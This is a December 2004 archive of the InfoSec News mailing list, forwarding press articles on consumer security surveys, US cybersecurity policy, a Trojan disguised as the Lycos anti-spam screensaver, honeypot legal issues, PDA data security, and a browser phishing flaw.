http://www.linuxsecurity.com/content/view/117296 * Panelists: A Secure Network Needs Informed Workers 1st, December, 2004 Analysts, law enforcement agents and corporate IT managers focused on surprisingly nontechnical security solutions Tuesday as they discussed the latest risks to corporate networks as part of Ziff Davis Media's online "virtual" tradeshow on security. http://www.linuxsecurity.com/content/view/117286 * Why you should take information security seriously 1st, December, 2004 All of us rely on information every day in just about every aspect of our life. As information is so important, we tend to rank it by its reliability. There are some people whose opinion we trust implicitly on certain matters. We accept as a matter of course that information is only valuable if it is accurate. The most valuable sources of information are those that are seen to be inherently reliable and easy to access. http://www.linuxsecurity.com/content/view/117297 * Federated ID facilitates Web services 1st, December, 2004 Companies looking to make Web services available to business partners and their respective user bases must first figure out how to federate identity. Federated identity management refers to managing access so that only those who have a right to use specific services may do so. http://www.linuxsecurity.com/content/view/117294 * Community Spam Fighting Effort Faces Heat 2nd, December, 2004 Lycos Europe is offering a "screensaver that spams the spammers," using idle computer time to attack sites that have been blacklisted for abusive spamming practices. Monitoring of three of the targets housed on Chinese servers shows that two of the sites, bokwhdok.com and printmediaprofits.biz, have been knocked offline by the attack. A third target, rxmedherbals.info, has remained largely available, with intermittent outages. 
http://www.linuxsecurity.com/content/view/117308 * Transcript of Launch Chat 2nd, December, 2004 To celebrate the launch of the new LinuxSecurity.com, we hosted a community chat event. It was held yesterday (December 1st 2004) at 4:00pm, and featured several prominent visionaries from the open source community including Jay Beale, Brian Hatch, Paul Vixie, Lance Spitzner, and Dave Wreski. The topics discussed ranged from authentication, patch management, honeypots, virtues of open source, SELinux, as well as others. We are planning another event to be held in January; please send us your ideas. (contribute@linuxsecurity.com) http://www.linuxsecurity.com/content/view/117310 * Follow-up: Lycos pulls anti-spam screensaver from site 3rd, December, 2004 Lycos Europe appeared to have pulled a controversial anti-spam screensaver program from its site on Friday, after coming under fire from both security experts and the spammers themselves. http://www.linuxsecurity.com/content/view/117323 * FBI's Cyber-Crime Chief Relates Struggle for Top Talent 1st, December, 2004 The FBI's inability to recruit and keep the best available IT talent has proven to be one of the biggest challenges facing the government's Internet Crime Complaint Center (I3C), a senior official said Tuesday. http://www.linuxsecurity.com/content/view/117285 * Linux in Government: The Government Open Code Collaborative 3rd, December, 2004 As we celebrate the holiday season and prepare for the next round of legislation, a group of state and local governments has banded together to collect and distribute freely the costly software that normally runs taxpayers $100 billion annually. Called the Government Open Code Collaborative or GOCC.gov, this organization states that its members work together voluntarily to encourage "the sharing, at no cost, of computer code developed for and by government entities where the redistribution of this code is allowed".
http://www.linuxsecurity.com/content/view/117322 * Is Cyberterrorism Being Thwarted? 3rd, December, 2004 Recently, there's been increased criticism of the federal government's efforts to secure the Internet. The September departure of Amit Yoran from the Department of Homeland Security was widely cited as indicative of problems that run deep, not just through DHS, but the entire government. While everyone agrees there's much work to do, it's important to recognize the accomplishments of the past few years. http://www.linuxsecurity.com/content/view/117324 * Mobile & Wireless: Security was the Watchword in 2004 1st, December, 2004 It's no surprise that the issue that topped the Wi-Fi agenda in 2004 was the same one that's plagued it almost from its introduction. Security, or rather "lack thereof," was an inherent problem in WEP (Wired Equivalent Privacy), the native security spec in the 802.11 IEEE standard. http://www.linuxsecurity.com/content/view/117283 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Tue Dec 7 03:25:03 2004 From: isn at c4i.org (InfoSec News) Date: Tue Dec 7 03:37:04 2004 Subject: [ISN] Gartner: Consumers dissatisfied with online security Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,98083,00.html By Paul Roberts DECEMBER 06, 2004 IDG NEWS SERVICE A survey conducted by Gartner Inc. shows that online consumers are growing frustrated with the lack of security provided by banks and online retailers and feel that passwords are no longer sufficient to secure their online transactions. The findings are the latest conclusions drawn from a survey of 5,000 adult Internet users. 
The survey, which concluded in April, showed that online shoppers want retailers to offer more than just passwords to protect their accounts, and indicate that concerns about a lack of security may be hampering the growth of online commerce, according to Gartner analyst Avivah Litan. Almost 60% of the respondents said they're concerned or very concerned about online security. Even more important for online retailers: Over 80% of those surveyed said they would buy more from an online vendor who offered them more than just a username and password to protect their accounts, she said. "The data shows that consumers want more than passwords," said Litan. However, there are limits to how far consumers will go to secure their online activities. When asked to choose among technologies to supplement password protections, respondents gave high ratings to low-tech options such as challenge and response features, which ask shoppers to provide responses to tailored questions, or shared secret technology that displays shopper-selected images on Web pages to prove the authenticity of e-commerce Web sites. More complicated solutions like security software downloads or so-called multifactor authentication that couple smart cards or USB tokens with usernames and passwords were less popular, said Litan. The most popular choice for fixing the security of online shopping and banking sites is for providers to be made legally responsible for strict security measures, she said. Also, those surveyed indicated that they want the choice of using stronger authentication but do not want to be forced to use it. "Our data shows that consumers think the system is easy to use, but they want something that gives them added protection," she said. Banks and online retailers in the U.S. have lagged behind their counterparts in the European Union and Asia when it comes to using strong authentication to secure online transactions, including smart-card technology and one-time passwords, said Litan. 
Gartner predicts that by the end of 2007, more than 60% of banks in the U.S., but fewer than 20% of banks worldwide, will rely on simple passwords to authenticate retail customers. But that may change, especially as retailers and banks contend with a wave of sophisticated online scams known as phishing attacks in which people are lured to phony Web sites where they're tricked into divulging personal information such as bank and credit card account numbers, Litan said. Recently, U.S. Bancorp. said that it will use a hardware-token-based authentication service from VeriSign Inc. to secure access to commercial banking services for its customers and may soon introduce a similar service for consumer banking customers. "We're getting more calls from banks and other providers that are looking to protect their customers and give them added security," said Litan. "They're worried that consumers are losing confidence in the online channel." Gartner will publish a research note on consumer authentication options in the near future, according to Litan. From isn at c4i.org Tue Dec 7 03:25:23 2004 From: isn at c4i.org (InfoSec News) Date: Tue Dec 7 03:37:06 2004 Subject: [ISN] Committee pushes for cybersecurity post Message-ID: Forwarded from: William Knowles http://www.fcw.com/fcw/articles/2004/1206/web-dhs-12-06-04.asp By Dibya Sarkar Dec. 6, 2004 Members of the House Select Homeland Security Committee have recommended establishing a new assistant secretary position within the Homeland Security Department to better integrate and coordinate cybersecurity issues. The recommendation is one of six suggestions listed in a new 41-page, bipartisan report [1] that was released today by the committee's cybersecurity subcommittee. The report stated that although DHS officials have created the National Cyber Security Division and several other coordination entities, "now is the time to build toward more robust capabilities." 
It also stated DHS officials need to exert more effort to work with the private sector and across critical infrastructure sectors in addition to state and local governments. Specifically, the report said officials should: * Create an assistant secretary position within DHS' Information Analysis and Infrastructure Protection Directorate to improve integration within the department and coordination of best practices, risk assessments and warnings across government and the private sector. * Develop a comprehensive and detailed program about current and future plans, implementation guidance and staff recruitment, retention and assignment goals. They should also provide budget information that would be linked to the national strategy. * Update the outreach, coordination and information sharing plan with the private sector, considering different needs of groups and innovative mechanisms for information sharing. * Improve performance on cybersecurity risk assessments and remediation activities that would include a plan for Internet-related recovery. They should also improve coordination with "cyber first responders" across the government and private sectors. * Identify specific initiatives in which DHS' cybersecurity division and the National Communications Systems, a two-dozen member federal interagency group that coordinates and plans for national security and emergency communications during crises, can work together because of their similar missions. Officials should advance the convergence of voice and data technology. * Support research and development and educational activities to improve products and services that are user-friendly. [1] http://hsc.house.gov/files/cybersecurityreport12.06.04.pdf *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. 
Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Wed Dec 8 02:58:08 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 8 03:15:16 2004 Subject: [ISN] Gartner: Consumers dissatisfied with online security Message-ID: Forwarded from: Mark Bernard Dear Associates, Are there any surprises here? I think that we're probably all a little concerned about online security. But for those who aren't sure what to think, there is always the option of paying Gartner $17k to have them tell you what you should be thinking!! Based on research that I have conducted against the Privacy Commissioner's database of completed investigations, over 67% of nearly three hundred investigations here in Canada have been conducted against financial institutions. In contrast, 97% of those investigations have required residual remedies to be developed and implemented to resolve confirmed issues. Lesson learned: do your homework up front and avoid productivity issues, federal investigations and wasting time/money. Mark E. S. Bernard, CISM, CISSP, PM, e-mail: Mark.Bernard@TechSecure.ca Web: http://www.TechSecure.ca Phone: (506) 325-0444 Leadership Quotes by Edwin H. Friedman: "Leadership can be thought of as a capacity to define oneself to others in a way that clarifies and expands a vision of the future." Information Security Notice: This e-mail is classified as private and is intended for use by the sender and recipient "only". Unauthorized access to this e-mail will be dealt with in accordance with the Canadian Charter of Rights and Freedoms, sections 7 and 8.
----- Original Message ----- From: "InfoSec News" To: Sent: Tuesday, December 07, 2004 4:25 AM Subject: [ISN] Gartner: Consumers dissatisfied with online security > http://www.computerworld.com/securitytopics/security/story/0,10801,98083,00.html > > By Paul Roberts > DECEMBER 06, 2004 > IDG NEWS SERVICE > > A survey conducted by Gartner Inc. shows that online consumers are > growing frustrated with the lack of security provided by banks and > online retailers and feel that passwords are no longer sufficient to > secure their online transactions. > > The findings are the latest conclusions drawn from a survey of 5,000 > adult Internet users. The survey, which concluded in April, showed > that online shoppers want retailers to offer more than just > passwords to protect their accounts, and indicate that concerns > about a lack of security may be hampering the growth of online > commerce, according to Gartner analyst Avivah Litan. > > Almost 60% of the respondents said they're concerned or very > concerned about online security. Even more important for online > retailers: Over 80% of those surveyed said they would buy more from > an online vendor who offered them more than just a username and > password to protect their accounts, she said. > > "The data shows that consumers want more than passwords," said > Litan. However, there are limits to how far consumers will go to > secure their online activities. [...] From isn at c4i.org Wed Dec 8 02:58:30 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 8 03:15:18 2004 Subject: [ISN] Tougher Cyber-Security Measures Urged Message-ID: http://www.washingtonpost.com/wp-dyn/articles/A45622-2004Dec7.html By Brian Krebs Special to The Washington Post December 8, 2004 A group representing technology industry executives yesterday called on the Bush administration to step up efforts to protect the nation's computer and Internet infrastructure, and it proposed that the top official in charge be given a higher profile. 
The Cyber Security Industry Alliance urged the federal government to elevate the position of national cyber-security director to the assistant secretary level. The director now reports to an assistant secretary who is responsible for both cyber and physical security threats. "There is not enough attention on cyber-security within the administration," said Paul B. Kurtz, the alliance's director and a former senior cyber-security official in the Bush administration. "The executive branch must exert more leadership." The alliance, an industry advocacy group that includes representatives from companies that sell cyber-security software, hardware and services, urged Bush to use his second term to focus more attention on cyber-security. Kurtz was joined at yesterday's event by Amit Yoran, the former director of Homeland Security's National Cyber Security Division who resigned in September. "We really have an opportunity here to address cyber-security in a more aggressive fashion," said Yoran, who was the third high-level cyber-security official to leave Homeland Security in 18 months. "There is broad unanimity across the cyber-security community that we are still vulnerable and we need to do more." The latest congressional effort to raise the profile of cyber-security within the Homeland Security Department failed this week. House leaders included language raising the cyber-security director's status in a bill designed to overhaul the nation's intelligence community, but the measure was stripped from the version of the legislation agreed to by House and Senate negotiators. The technology industry alliance's recommendations closely mirror those set out in a 41-page report issued Monday by the House subcommittee on cyber-security, part of the Committee on Homeland Security. 
That report also calls for an assistant secretary post at Homeland Security, and it urges the administration to consider tax breaks and other incentives for businesses that make computer security a top priority. The congressional report and the recommendations released by the technology industry group reflect growing frustration with the White House's commitment to implement its cyber-security strategy. A February 2003 report laid out the administration's vision for protecting key areas of the Internet from digital sabotage as part of a broader strategy for guarding vital U.S. assets. The House Homeland Security Committee and the Cyber Security Industry Alliance both want the department to match budget money to specific cyber-security programs and to take the lead on creating a disaster recovery and response plan should the United States suffer a debilitating digital attack. Both also want the White House to lean on the Senate to ratify the Council of Europe's cyber-crime treaty to help law enforcement bring more hackers and virus writers to justice and to dedicate more money to long-term cyber-security research and development programs. In addition, the administration should direct a federal agency to track costs associated with cyber-attacks, an effort that experts said will help drive a market for cyber-security risk insurance and help companies make a stronger business case for investments in computer security technologies. Lawrence C. Hale, deputy director of Homeland Security's National Cyber Security Division, defended the department's progress. He cited the development of a program to find and fix vulnerabilities in so-called "digital control systems," the technology used to manage systems such as the power grid and chemical manufacturing processes. Hale added that the department has been working to expand national emergency response plans to include cyber-security. 
He also said the department has been instrumental in helping federal agencies respond to and prevent computer attacks.

"Do we have a long way to go? Certainly. But I would say that we're much better off than we were a year ago, and that both government and industry have made great strides," Hale said.

Krebs is a staff writer for washingtonpost.com. Washingtonpost.com staff writer Robert MacMillan contributed to this story.

From isn at c4i.org Wed Dec 8 02:58:41 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 8 03:15:20 2004
Subject: [ISN] Fake Lycos screensaver harbours Trojan
Message-ID:

http://www.theregister.co.uk/2004/12/07/fake_lycos_screensaver_trojan/

By John Leyden
7th December 2004

Virus writers have begun distributing their wares in emails that pose as Lycos's abandoned "Make love not spam" screensaver. The fake screensaver emails contain an attachment with a RAR SFX archive that has a key-logger Trojan embedded inside, antivirus firm Sophos warns.

Infected messages come with subject lines such as "Be the first to fight spam with Lycos screen" and an attachment called "Lycos screensaver to fight spam.zip". Upon successful installation, the key-logging Trojan (Mdropper-IT) sends a message to an Indonesian email address confirming its status. The screensaver file, rather than displaying the Lycos screensaver, displays a blank screen.

"Make Love Not Spam" was designed to bombard spam websites with requests, so increasing their bandwidth charges without - in theory - shutting them down. Security firms criticised Lycos's use of "vigilante tactics", especially when two of the targeted websites became unavailable. Several major internet backbone providers and ISPs blocked access to Lycos' www.makelovenotspam.com website over concerns over its questionable legality.
Lycos denied it was doing anything wrong, much less creating a DDoS attack platform, but it suspended screensaver downloads after spammers began redirecting traffic back to makelovenotspam.com. This won't necessarily stop people falling for the VX ruse, unfortunately; fake Lycos screensavers will likely become a staple of social engineering tricks for weeks to come.

From isn at c4i.org Wed Dec 8 02:59:08 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 8 03:15:22 2004
Subject: [ISN] Survey: Most EMEA countries unprepared for a disaster
Message-ID:

http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,98098,00.html

By Samantha Perry
DECEMBER 07, 2004
Computerworld South Africa

JOHANNESBURG - Veritas Software Corp. last week released the results of its third annual disaster recovery study, which revealed, among other things, that 97% of businesses surveyed in EMEA (Europe, Middle East and Africa) would be unable to continue normal operations following a data center fire.

The survey, conducted worldwide by UK-based Dynamic Markets, polled 1,259 IT professionals at companies with more than 500 employees.

Of the EMEA IT managers surveyed, only 3% said they would be able to continue with business as usual after a data center fire. Thirty-eight percent had no idea how long it would take to resume bare bones operations, 31% could achieve bare bones service within 12 hours, and 38% didn't know how long it would take to get back to business as usual. In addition, 52% said that the only copy of their organization's disaster recovery plan was stored in the data center.

According to the research, 16% of companies surveyed in EMEA don't have a disaster recovery plan in place. Thirty-four percent of these companies said they had not got around to it and 24% were in the process of putting a plan together.
Another 24% felt they didn't need a DR plan, and of these, 19% say the company is too small to merit it, and 6% say that their board would not back such an initiative.

Of those companies that do have DR plans in place, the majority don't review them often enough, resulting in plans that are falling behind in the face of rapidly changing technology. However, 92% of those companies with plans do actually review them: 13% do so monthly; 8% do so every three months; 14% every six months, 34% annually, 12% review on an ad hoc basis, and 9% review either less than every three years, never review, or do not know if they review. The figures for those companies that actually test their plans are much the same.

Chris Boorman, Veritas vice president of marketing for EMEA, said, "The issue of change control is an interesting one, particularly in light of the substantial increase in patches that we have been seeing lately, and spiraling concerns about viruses and accidental or malicious employee behavior."

"While patch updates will rarely trigger the need for a change in DR strategy, IT departments should certainly be reviewing their DR plans more frequently than once a year," he concludes.

From isn at c4i.org Wed Dec 8 02:59:26 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 8 03:15:23 2004
Subject: [ISN] Security 'Honey Pots' May Snare Private Details
Message-ID:

http://www.eweek.com/article2/0,1759,1737144,00.asp

By Michael Myser
December 7, 2004

Though some legal issues still surround "honey pots," their use within the security industry is fairly common and is considered a critical weapon in fighting malicious hackers and viruses.

"They're an incredibly valuable tool," said Rich Mogull, research director at analyst firm Gartner Inc. of Stamford, Conn. "You can't really know what's happening without monitoring what's going on in the world. Honey pots and honey nets do a good job of this."
Setting up an unprotected server or network invites attackers to infect or examine the system. The honey pots are then used to track the hackers and collect data on the way the intruders operate. Information collected in honey pots is typically used to power early warning and prediction systems.

"It's not something every organization needs, but I expect all security vendors to be doing something [like this]," Mogull said. "That's how you're going to find out what the new threats are, without compromising your real systems."

IMlogic Inc. of Waltham, Mass., told eWEEK.com it would use IM honey pots to drive its Threat Center initiative, which will warn vendors of new spam and malware attacks.

Though Gartner's Mogull wasn't at all surprised that IMlogic would employ this technique, legal issues still can arise from honey pots if security vendors and enterprises aren't careful. For one, enterprises could be found liable if hackers were to use honey pots as a launching pad to harm another entity.

"If you've created a dangerous, open resource, you've created a tool for hackers to use," said Benjamin Wright, an attorney and instructor at the SANS Institute. "You need to avoid anything that encourages damage to a third party."

One way to avoid that, he said, is to label the honey pot as off limits, or a resource that is private property, which outsiders are not authorized to use. Such labeling also would help ward off the common defense tactic of citing "entrapment" in the case of prosecution.

"Entrapment is when somebody induces the criminal to do something he was not otherwise imposed to do," Wright said. He explained that it's a common misconception that organizations can be sued for entrapment, when in reality, it's used only to defend the accused and should not be a concern for enterprises.
Lance Spitzner, founder of the nonprofit security organization Honeynet Project, agreed, saying that neither liability nor entrapment has been an issue, but that privacy is a concern.

"From a privacy perspective, you need to consider what you capture, how you capture it, and what you use it for," Spitzner said. He said the main concern surrounds violating the federal Wiretap Act, which prohibits intercepting the content of communications.

"Are you getting the conversations themselves?" he asked. "The more data you're pulling, the more potential privacy issues there are."

If a firm is capturing transactional information such as IP addresses, or examining malware contained in the communications, there likely is little to be concerned about. IMlogic told eWEEK.com its honey pots would likely only receive spam or malware, so conversations wouldn't be an issue.

But there are still no hard and fast answers to some of these legal concerns. "There is no absolute authority, because there are so many variables involved and no precedents," Spitzner said. The Honeynet Project recently published a book [1] on honey pots, which includes a chapter (here in PDF form) [2] on legal concerns by Richard Salgado of the Department of Justice.

Security firm Sophos, based in the United Kingdom, isn't much concerned with the legal aspects of honey pots and is one of many vendors using various types to develop cyber-defenses.

"We receive millions of spam messages into our traps from around the world," said Gregg Mastoras, senior security analyst at Sophos. "We take those messages, dissect them, try to understand them, where they're coming from, and build protection around it for our clients."

Because it's a closed system--the spam and viruses the company receives don't get distributed from the Sophos system--and the company isn't building legal cases against spammers, there aren't legal implications for its spam traps.

"Most of the security research companies use honey pots to get information on bad guys, malware, viruses and things like that," Honeynet's Spitzner said. "Honey pots are also becoming more commonly accepted, so they're being used for marketing purposes by security firms."

"If you're going to develop products and services to defeat these, you've got to understand the basics of what they're delivering by actually getting some of them yourself," Sophos' Mastoras said.

[1] http://www.amazon.com/exec/obidos/ASIN/0321166469/c4iorg
[2] http://www.honeynet.org/book/Chp8.pdf

From isn at c4i.org Thu Dec 9 03:14:36 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 9 03:28:24 2004
Subject: [ISN] Keeping sensitive info secure is a major concern with PDAs
Message-ID:

http://www.itbusiness.ca/index.asp?theaction=61&lid=1&sid=57610

By Lynn Greiner
12/8/2004

The most secure company probably has a gaping hole in its corporate pocket, which allows crucial data to slip out.

Yes, the network is protected by a firewall, intrusion detection system and virus scanner. The PCs on that network are locked down. The wireless network is encrypted and secured. Data is properly backed up. All is mellow.

Then the senior vice-president tucks his personal digital assistant (PDA) into his jacket pocket and heads out to the fitness club, where that jacket will be left unattended while he works out. Or the marketing manager grabs his cell phone and runs to a meeting, where he will leave the phone on the conference room table while he visits the washroom.

What's protecting the data in those devices?

In a study conducted earlier this year by the Graziadio School of Business and Management at Pepperdine University in Los Angeles, 81 per cent of respondents said they carry "somewhat valuable" or "extremely valuable" information on their PDAs. Sixty per cent of executive-level respondents said their business would be "somewhat" or "extremely" affected if the data on company-issued PDAs were lost.
And 24 per cent have experienced loss or theft of at least one PDA.

Devices become life repositories

Despite this, half of the respondents did not have any security on their PDAs, beyond (perhaps) a power-on password. That blood-curdling scream you just heard is your security officer, who until now thought he had a handle on vulnerabilities.

With any personal device, be it company-issued or employee owned, management is a major headache. It's as much a social problem as a technological one. Users treat their PDAs and cell phones as life repositories, storing business and non-business data cheek by jowl, and consider attempts to manage the devices as affronts to their privacy. Yet as long as there's a scrap of business data on the device -- a phone number, a password, even a meeting reminder -- the "private" device is very much the company's concern.

Managing it, however, is easier said than done. It's easy to back up data on a PDA if it synchs to a company computer - just back up the files on the computer. The trick is in protecting it while it's out and about in the handheld. That mainly entails preventing the user from turning off any security on the unit.

That's not all there is to management of mobile devices, however. There's asset management: controlling who has which device, operating system and so forth. There's configuration management: making sure that all applications are installed that should be, in their correct versions. There's encryption. If the machine has communications capabilities (802.11b, for example, or if it's a smart phone), there's network and virtual private network (VPN) configuration and security to worry about.

Fortunately, there are both standalone products and modules for enterprise management suites that can handle the job. They can even program the handheld to erase all of its data after a predefined number of bad login attempts; a thief may get a free PDA, but company information will be protected.
Unfortunately, these products can cost several hundred dollars per protected unit (for small license counts). Despite this heavy hit on the corporate wallet, IDC says that the market for mobile management products is expected to achieve a compound annual growth rate of 44.9 per cent through 2008, when it will be a whopping $US911.4 million.

Tell the boss what's at risk

Before you manage mobile devices, though, you have to find them. And if users have local administrator privileges on their PCs (generally a bad thing, by the way), it may be easier said than done. In that case, when users acquire their new mobile toys, they can just quietly install the synchronization software and merrily start pulling corporate financial spreadsheets onto their devices without anyone's knowledge. The first IT will hear about it is when the handheld hiccups and its owner comes for help, or a PC acts up and the responding tech notices the new software.

Then, of course, the user will howl when told that he or she shouldn't be loading company information onto a personal device. It, after all, increases their productivity. And they're probably right, but convincing them that it also increases risk to the company is usually a losing battle. You might have better luck persuading them to enable power-on passwords, insisting they use encryption software for business information (for which the company will pay), and insisting that the device be locked when idle.

You also need to make sure that the edict comes from the top. Chances are, the boss is one of the culprits. Convince him or her of the ri$k to the company, and guilt will do the rest.

From isn at c4i.org Thu Dec 9 03:14:51 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 9 03:28:26 2004
Subject: [ISN] Air Force wants faster patching
Message-ID:

http://www.fcw.com/fcw/articles/2004/1206/web-airforce-12-08-04.asp

By Frank Tiboni
Dec. 8, 2004

Air Force officials will meet next week to discuss broadening their information assurance efforts to include speeding the service's software-patching process.

Officials' ultimate goal is to have software patches implemented across the Air Force in minutes. During the next few months, they hope to cut the time from tens of days to just days, said Col. Ronnie Hawkins, director of communications operations in the Office of the Deputy Chief of Staff for Installation and Logistics. Hawkins spoke Dec. 7 at Air Force Information Technology Day, sponsored by AFCEA International.

Air Force officials can deliver a software patch across the service in minutes, but it takes much longer to install them, Hawkins said. Although patches are distributed automatically, they often are put on computers manually, which can take months. Air Force chief information officer John Gilligan has described that delay as unacceptable.

Air Force officials last month signed two Microsoft consolidation contracts worth $500 million over the next six years to streamline the service's software and support contracts with the company. The $70 million support portion allows for the automatic distribution and installation of Microsoft software patches.

From isn at c4i.org Thu Dec 9 03:15:05 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 9 03:28:38 2004
Subject: [ISN] Browser phishing 'flaw' could hook users
Message-ID:

http://news.com.com/Browser+phishing+flaw+could+hook+users/2100-1002_3-5484315.html

By Robert Lemos
Staff Writer, CNET News.com
December 8, 2004

A function built into all major browsers could be co-opted by attackers to fool Web site visitors into surrendering sensitive information, a security firm warned on Wednesday.

The issue, which security firm Secunia labeled a flaw, could allow a malicious Web site to refer visitors to a legitimate site--such as a bank's Web site--and then control the content displayed in a pop-up window.
The issue affects Microsoft's Internet Explorer, the Mozilla Foundation's Mozilla and Firefox browsers, Opera's browser, the open-source Konqueror browser and Apple Computer's Safari, the firm stated in advisories on its site.

"No browsers warn or check if the other site is allowed to change the content of the pop-up window," Thomas Kristensen, chief technology officer for Secunia, said in an e-mail to CNET News.com. "If the pop-up window is opened because the users clicked on a specific functionality, the user has no reason to suspect that the content in the window has been changed by a malicious site."

The company has created a demonstration that takes advantage of the flaw on its Web site. The example sends a user to Citibank's Web site, where clicking on the image opens a pop-up window that is controlled by Secunia's program.

Microsoft said that the attack uses a legitimate feature of browsers to fool users.

"Our initial investigation has revealed that the report describes a by-design behavior in all popular web browsers that allows a website to open or re-use a window without displaying the address bar, which is a trust mechanism built into web browsers," the company said in a statement sent to CNET News.com.

Apple, the Mozilla Foundation and Opera could not immediately be reached for comment on the issue.

The hack of a legitimate feature is the latest security threat that could help phishers wrest identity information away from consumers. Last month, online intruders breached the security of at least one server at advertising host Falk and used the computer to distribute an attack to the service's clients, including The Register, a technology news and opinion site. Other flaws, together with mass e-mailing of links pointing to a malicious Web site, have been used to get aggressive advertising software, known as adware, installed on victims' computers.

Microsoft stressed that Windows XP users who have installed Service Pack 2 have some anti-phishing tools.
Any window that asks for log-in, financial or personal information should be encrypted and display a lock icon in the status bar at the bottom of the window, Microsoft said in a statement.

"Some phishing cons have shown users a fake lock icon in a fake status bar at the bottom of the browser window," the statement said. "Internet Explorer in Windows XP SP2 will always show the real status bar so that users can detect a fake lock icon from a real one."

However, Secunia said that the browser makers miss the point. Most users won't notice small details like that if they believe they are at a legitimate site.

"The browser vendors fail to take into consideration the change of malicious activities on the Internet and the fact that security holes, which can be exploited to automatically install malicious code, isn't the only thing to be concerned about," Kristensen said.

Secunia advised Web surfers to have only one window open when browsing sensitive sites such as banks and Web stores.

From isn at c4i.org Thu Dec 9 03:15:18 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 9 03:28:40 2004
Subject: [ISN] Severity of 127-day-old W2K flaw 'being determined'
Message-ID:

http://www.theage.com.au/news/Breaking/Severity-of-127dayold-W2K-flaw-being-determined/2004/12/08/1102182337247.html

By Sam Varghese
December 8, 2004

A longstanding security vulnerability in Windows 2000, deemed to be highly critical by the reputed security firm eEye Digital Security, is being investigated by Microsoft, the company says.

The disclosure by eEye was made 127 days ago. A few days ago, Microsoft said it would not be releasing a fifth service pack for Windows 2000; rather it would issue an Update Rollup next year as a final security patch.
Full details of the flaw found by eEye have not been revealed publicly but have been sent to Microsoft; what little detail has been provided publicly says it is "a remotely-exploitable vulnerability that allows anonymous attackers to compromise default installations of the affected software, without requiring user interaction, and gain absolute access to the host machine."

Asked whether Microsoft would be patching this as a part of the final security patch for Windows 2000, a Microsoft spokesman indicated that the company was not yet sure whether the problem was severe or not.

"Microsoft is investigating reports from eEye Digital Security of a possible vulnerability in Windows 2000 that could allow an attacker to compromise default installations of the affected software and gain access to a user's machine," the spokesman said. "Microsoft is currently unaware of active attacks against customers attempting to utilise this vulnerability, but is actively investigating the reports."

eEye has found numerous serious flaws in various Windows versions in the past, including the vulnerabilities that resulted in attacks by worms like Sasser, Witty, and Code Red.

The Microsoft spokesman said: "Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a fix through our monthly release process or an out-of-cycle security update, depending on customer needs.

"Security response requires a balance between time and testing, thus Microsoft will only release an update - when warranted - that is as well engineered and as thoroughly tested as possible - whether that is a day, week, month or longer. In security response, an incomplete security update can be worse than no patch at all if it only serves to alert malicious hackers to a new issue."

Mainstream support for Windows 2000 will expire in June next year.
A survey by the technology research firm Gartner in October found that around 60 percent of business users are still sticking with Windows 2000.

From isn at c4i.org Thu Dec 9 03:15:36 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 9 03:28:42 2004
Subject: [ISN] The Password PUZZLE
Message-ID:

http://www.dfw.com/mld/dfw/10366676.htm

By Aman Batheja
Star-Telegram Staff Writer
Dec. 08, 2004

It's December, so Dorothy probably has "candycane" written on a piece of paper in her desk drawer. Last month, it was "turkey." Before that, "pumpkin."

At work, Dorothy often chooses her computer password based on the next holiday on the calendar. She has to use several methods of creating passwords because she must change them so often.

"You have to write them down, and I know I shouldn't," said Dorothy, a Fort Worth woman who asked that her last name not be used because, well, she just told everyone her password. "I have an entire sheet of passwords at my desk, which defeats the purpose of security."

Whether it's the name of a child, a favorite sports team or a hot vacation spot, the constantly growing list of computer passwords needed to exist in a Web-addicted world is taxing people's patience -- and memory.

Thanks to multiple e-mail accounts, online stores, online bill paying and network software, the plethora of passwords has some people on information overload. And it can only get worse this month as Internet shoppers log on to order those Christmas gifts.

"We're making computer security too hard for the average user," said Steve Jones, founder of the Association of Internet Researchers.

Most people end up using the same password for all their computer activities, Jones said. Or they don't change their passwords often enough. Or they choose passwords that are too obvious. All of those open the door to hackers.

A survey conducted this year in London by Infosecurity Europe showed that the most common passwords were names of relatives, followed by sports teams and pets.
A recent study at Southern Methodist University found that two-thirds of people's passwords are based on the users' personal characteristics, said Alan Brown, a psychology professor who conducted the study.

Brown surveyed 218 students and found that about half based their passwords on proper names and birthdays, he said. Just 7.1 percent of the respondents used a password only once. The rest duplicated the same password for more than one application, some five or six times.

"It was kind of disappointing," Brown said. "We confirmed what the suspicion was."

That sloppy password conduct makes stealing credit card numbers and other personal information all too easy for hackers, experts say.

"As far as security is concerned, passwords are probably the No. 1 problem," said Mike Stute, chief technology officer for Global DataGuard in Dallas.

Unconcerned about threats

Every month, the Windows XP Professional software on Nathan's computer asks him for a new password. Every month, he types in the same one.

"Nobody's trying to rip me off," he said.

That I'm-too-small-potatoes-for-a-hacker-to-care-about attitude is all too prominent, according to Rick Fleming of Digital Defense, a San Antonio-based network security firm.

About 10 million Americans were victims of identity theft in 2003, according to the Federal Trade Commission. Many victims never figure out how their information was stolen. But information stolen from the Internet is likely to be used in the most prevalent crimes -- illegal credit card purchases and unauthorized checking account transfers -- according to a September study from Gartner Research, a company based in Bridgewater, N.J., that specializes in technology issues.

"The biggest threat to security is people's lack of concern about it," said Fleming, a computer security veteran of more than 20 years.

When people imagine computer hackers, they might think of Matthew Broderick in the 1983 movie WarGames.
Broderick's character guesses the password to a classified military computer. But the typical hacker uses "brute force" -- password-cracking programs that can try up to 300,000 passwords a second. If the word is in the dictionary or is a proper name, a hacker can crack it in less than a minute, Fleming said. The programs are "in every language known to Earth and a few that aren't, like Klingon," Fleming said.

